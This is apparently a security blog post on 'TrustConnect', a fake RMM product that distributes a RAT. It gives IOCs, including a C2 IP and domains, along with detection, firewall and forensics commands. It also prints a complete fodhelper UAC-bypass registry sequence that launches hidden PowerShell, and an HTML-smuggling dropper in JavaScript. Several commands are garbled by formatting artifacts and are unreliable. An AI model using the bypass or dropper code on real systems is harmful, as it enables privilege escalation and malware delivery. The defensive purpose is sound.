The Rise of RAT-as-a-Service: How Fake RMM Software is Bypassing Enterprise Defenses + Video

Listen to this Post

Featured Image

Introduction:

In a sophisticated twist on the remote access Trojan (RAT) economy, cybercriminals have begun creating entirely fictitious remote monitoring and management (RMM) vendors to distribute malware under the guise of legitimate enterprise software. Researchers at Proofpoint recently uncovered “TrustConnect,” a fake RMM tool sold for $300 per month that is actually a full-featured RAT backdoor, complete with a professional website and a legitimate Extended Validation (EV) code-signing certificate . This evolution represents the commercialization of remote access malware into a subscription-based model—RAT-as-a-Service (RATaaS)—that lowers the barrier to entry for aspiring cybercriminals while increasing the difficulty of detection for defenders .

Learning Objectives:

  • Understand the anatomy of a RATaaS operation and how criminals are abusing trust mechanisms like EV certificates
  • Learn technical indicators of compromise (IOCs) and behavioral patterns associated with fake RMM/RAT payloads
  • Master practical detection and mitigation techniques using command-line tools across Windows and Linux environments
  • Analyze evasion techniques including HTML smuggling, process masquerading, and living-off-the-land strategies
  • Develop proactive defense strategies against subscription-based malware delivery models

You Should Know:

1. Anatomy of the TrustConnect RATaaS Operation

The TrustConnect operation represents a new level of criminal professionalism. The attackers registered trustconnectsoftware[.]com on January 12, 2026, and populated it with AI-generated content including fake customer testimonials, pricing tiers, and technical documentation to appear legitimate . They went so far as to obtain a genuine EV code-signing certificate—which requires rigorous validation by certificate authorities—to digitally sign their malware and bypass security controls that trust signed binaries .

Step‑by‑step guide to understanding the attack chain:

The infection begins with phishing emails posing as project bids or meeting invitations. These contain links to a malicious executable (MsTeams.exe) that drops TrustConnectAgent.exe. Below is the observed execution flow:

Phishing Email → Malicious Link → MsTeams.exe → TrustConnectAgent.exe → C2 Communication (178[.]128[.]69[.]245)

The RAT provides attackers with:

  • Full keyboard and mouse control
  • Screen recording and streaming capabilities
  • File transfer and command execution
  • User Account Control (UAC) bypass

Detection commands for network analysts:

 Capture traffic to known malicious C2 (Linux/macOS)
sudo tcpdump -i eth0 host 178.128.69.245 -w trustconnect-traffic.pcap

Check for established connections to suspicious IPs (Windows)
netstat -ano | findstr 178.128.69.245

DNS query monitoring for trustconnectsoftware[.]com (Linux)
sudo tcpdump -i eth0 -n port 53 | grep trustconnect

2. HTML Smuggling and Multi-Stage Payload Delivery

Modern RAT delivery increasingly relies on HTML smuggling—a technique that embeds malicious payloads within HTML files to evade network-based detection. When victims open the HTML in a browser, client-side JavaScript reconstructs the malware locally . This bypasses email gateways that scan attachments because the malicious content is only assembled on the victim’s machine.

Step‑by‑step HTML smuggling analysis:

The DCRat campaign demonstrated how effective this technique can be. Attackers distributed password-protected ZIP archives embedded in HTML files disguised as legitimate applications like TrueConf and VK Messenger .

// Example of HTML smuggling code (conceptual)
function base64ToArrayBuffer(base64) {
var binaryString = window.atob(base64);
var bytes = new Uint8Array(binaryString.length);
for (var i = 0; i < binaryString.length; i++) {
bytes[bash] = binaryString.charCodeAt(i);
}
return bytes.buffer;
}

// Malicious payload embedded as base64
var payloadBase64 = "UEsDBBQAAAAIA..." // Truncated example
var blob = new Blob([base64ToArrayBuffer(payloadBase64)], {type: 'application/zip'});
var link = document.createElement('a');
link.href = URL.createObjectURL(blob);
link.download = 'Project_Details.zip';
link.click();

Detection methods for HTML smuggling:

 Extract JavaScript from HTML files and search for base64 patterns
grep -E "(base64|atob|createObjectURL|Uint8Array)" suspicious.html

Monitor for browser processes spawning compression utilities (Windows)
Get-Process | Where-Object {$_.ProcessName -match "winrar|7z|zip|powershell"}

3. Persistence Mechanisms Across Operating Systems

Both TrustConnect and similar RATs like PyRAT and NonEuclid employ robust persistence mechanisms to maintain access after reboots. Understanding these helps incident responders locate and remove infections .

Linux persistence detection:

PyRAT, a Python-based RAT packaged as an ELF binary, uses XDG autostart directories for persistence on Linux systems .

 Check for suspicious autostart entries
ls -la ~/.config/autostart/
cat ~/.config/autostart/.desktop | grep -E "Exec=|Name="

Examine systemd user services for persistence
find ~/.config/systemd/user/ -name ".service" -exec grep -l "ExecStart" {} \;

Check cron jobs for unusual entries
crontab -l
sudo crontab -l
ls -la /etc/cron./

Windows persistence detection:

NonEuclid RAT, developed in C for .NET Framework 4.8, modifies registry Run keys and creates scheduled tasks .

 Check common registry persistence locations
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
Get-ChildItem -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"

List all scheduled tasks and filter for suspicious names
Get-ScheduledTask | Where-Object {$_.TaskName -match "update|security|system|trustconnect|docconnect"}

Check startup folder for unexpected shortcuts
Get-ChildItem "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
Get-ChildItem "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"

4. Evasion Techniques: UAC Bypass and AMSI Evasion

Advanced RATs like NonEuclid implement sophisticated evasion techniques to bypass Windows security mechanisms. UAC bypass allows privilege escalation without user prompts, while AMSI (Antimalware Scan Interface) patching prevents PowerShell and script-based detection .

Step‑by‑step UAC bypass analysis:

 Common UAC bypass technique using fodhelper.exe (for educational purposes)
 This is how attackers might elevate privileges
New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -PropertyType String -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(Default)" -Value "cmd.exe /c start powershell.exe -WindowStyle Hidden -Command malicious.ps1" -Force

Execute fodhelper to trigger the bypass
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

Cleanup after execution
Remove-Item -Path "HKCU:\Software\Classes\ms-settings\" -Recurse -Force

AMSI bypass detection:

 Check for AMSI bypass attempts in event logs
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} | 
Where-Object {$_.Message -match "AmsiInitialize|AmsiScanBuffer|reflection"}

Monitor for registry modifications affecting AMSI
Get-WinEvent -LogName Security | Where-Object {$_.Message -match "REG_SET_VALUE.SOFTWARE\Microsoft\AMSI"} -MaxEvents 50

5. Network Infrastructure and C2 Resilience

Following the disruption of TrustConnect’s infrastructure on February 17, 2026, the operators quickly pivoted to new infrastructure and began testing a rebranded version called “DocConnect” or “SHIELD OS v1.0” . This demonstrates the resilience of RATaaS operations and the importance of continuous monitoring.

Infrastructure tracking commands:

 Passive DNS reconnaissance (using legitimate threat intelligence sources)
dig docconnect[.]com any
whois docconnect[.]com

SSL certificate transparency log searching
curl -s "https://crt.sh/?q=%.docconnect.com&output=json" | jq .

Monitor for newly registered domains resembling trusted software
 Using SecurityTrails API or similar (conceptual)
curl -H "APIKEY: YOUR_KEY" "https://api.securitytrails.com/v1/search/list?query=trustconnect|docconnect|shieldos"

Network segmentation to contain RAT communication:

 Block C2 communication at the firewall level (Linux iptables)
sudo iptables -A OUTPUT -d 178.128.69.245 -j DROP
sudo iptables -A OUTPUT -p tcp --dport 4444 -j LOG --log-prefix "RAT C2 ATTEMPT: "

Windows Firewall block rules
New-NetFirewallRule -DisplayName "Block TrustConnect C2" -Direction Outbound -RemoteAddress 178.128.69.245 -Action Block
New-NetFirewallRule -DisplayName "Block High-Risk Ports" -Direction Outbound -Protocol TCP -RemotePort 4444,5555,6666,8080 -Action Block

6. Memory Forensics and Process Analysis

Detecting RATs that don’t write files to disk requires memory forensics. Many modern RATs execute entirely in memory to avoid traditional file scans .

Linux memory analysis:

 Capture memory for offline analysis
sudo cat /proc/kcore > memory.dump  Or use LiME for full capture

Check running processes for anomalies
ps aux --forest | grep -E "[|systemd|init"  Look for bracketed processes
lsof -p [bash] | grep -E "deleted|memfd"  Check for memory-only files

Examine network connections per process
sudo netstat -tunap | grep ESTABLISHED

Windows memory analysis:

 Use built-in tools for process investigation
Get-Process | Sort-Object CPU -Descending | Select -First 20

Check for processes with no parent (anomalous)
Get-WmiObject Win32_Process | Where-Object {$<em>.ParentProcessId -eq 0 -and $</em>.Name -notmatch "System|smss|csrss|wininit|services|lsass"}

List loaded DLLs for suspicious processes
Get-Process -Name "TrustConnectAgent" -ErrorAction SilentlyContinue | 
ForEach-Object { $<em>.Modules } | 
Where-Object {$</em>.ModuleName -match "temp|users|AppData"}

7. Ransomware Capabilities in Modern RATs

The convergence of RAT functionality with ransomware capabilities represents a significant threat. NonEuclid includes built-in encryption routines that target specific file extensions and append “.NonEuclid” to encrypted files, effectively operating as both a backdoor and ransomware .

File encryption monitoring:

 Monitor for mass file renaming events (Windows)
Get-WinEvent -LogName Security | Where-Object {$<em>.ID -eq 4663 -and $</em>.Message -match "WriteData|Delete"} -MaxEvents 1000 | 
Group-Object -Property {$_.Properties[bash].Value} | Sort-Object Count -Descending

Real-time file system monitoring (PowerShell)
$watcher = New-Object System.IO.FileSystemWatcher
$watcher.Path = "C:\Users"
$watcher.IncludeSubdirectories = $true
$watcher.EnableRaisingEvents = $true
Register-ObjectEvent $watcher "Created" -Action {
if ($EventArgs.Name -match ".NonEuclid$") {
Write-Host "ALERT: Ransomware activity detected - $($EventArgs.FullPath)"
}
}

Linux file integrity monitoring:

 Use inotify to monitor for mass file changes
inotifywait -m -r --format '%w%f' -e modify,create,delete /home | 
while read FILE; do
if [[ $FILE == .encrypted ]] || [[ $FILE == .locked ]]; then
logger -p auth.alert "Possible ransomware encryption: $FILE"
fi
done

What Undercode Say:

  • The TrustConnect operation demonstrates that cybercriminals are now matching legitimate software vendors in professionalism, complete with AI-generated content, EV certificates, and subscription pricing models. This RATaaS evolution fundamentally changes the threat landscape by making sophisticated malware accessible to low-skill attackers for a monthly fee.

  • Defenders must shift from signature-based detection to behavioral analysis. The use of legitimate code-signing certificates and professional websites means traditional reputation-based blocks will fail. Instead, organizations should focus on anomalous behavior—unexpected outbound connections, unusual process relationships, and unauthorized registry modifications.

  • The rapid pivot from TrustConnect to DocConnect following infrastructure takedown highlights the inadequacy of static blocking alone. Organizations need automated threat intelligence feeds that update in real-time and adaptive defense mechanisms capable of recognizing rebranded variants through behavioral patterns rather than file hashes.

  • The convergence of RAT and ransomware functionality in malware like NonEuclid signals a troubling trend. Attackers no longer need separate toolkits for access and extortion—they can now purchase a single subscription that provides both capabilities, increasing the potential impact of every infection.

  • HTML smuggling and multi-stage delivery techniques specifically target the gap between network security (which sees benign HTML) and endpoint security (which sees the assembled payload). Defense requires integrated visibility across the entire kill chain, with coordination between email security, web gateways, and endpoint detection.

Prediction:

Within the next 12-18 months, we will see the emergence of fully integrated cybercrime SaaS platforms offering bundled services—RAT access, ransomware encryption, data exfiltration storage, and even customer support—all under single subscriptions with tiered pricing. Law enforcement takedowns will become increasingly ineffective as operators adopt resilient, distributed infrastructure models and rapidly rebrand following disruptions. The barrier to entry for cybercrime will continue to fall, leading to a surge in mid-market and small business targeting as attackers seek volume over high-value single targets. Organizations that fail to implement behavior-based detection and automated response capabilities will face near-continuous compromise attempts from a growing pool of RATaaS customers.

▶️ Related Video (84% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Michael Tchuindjang – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky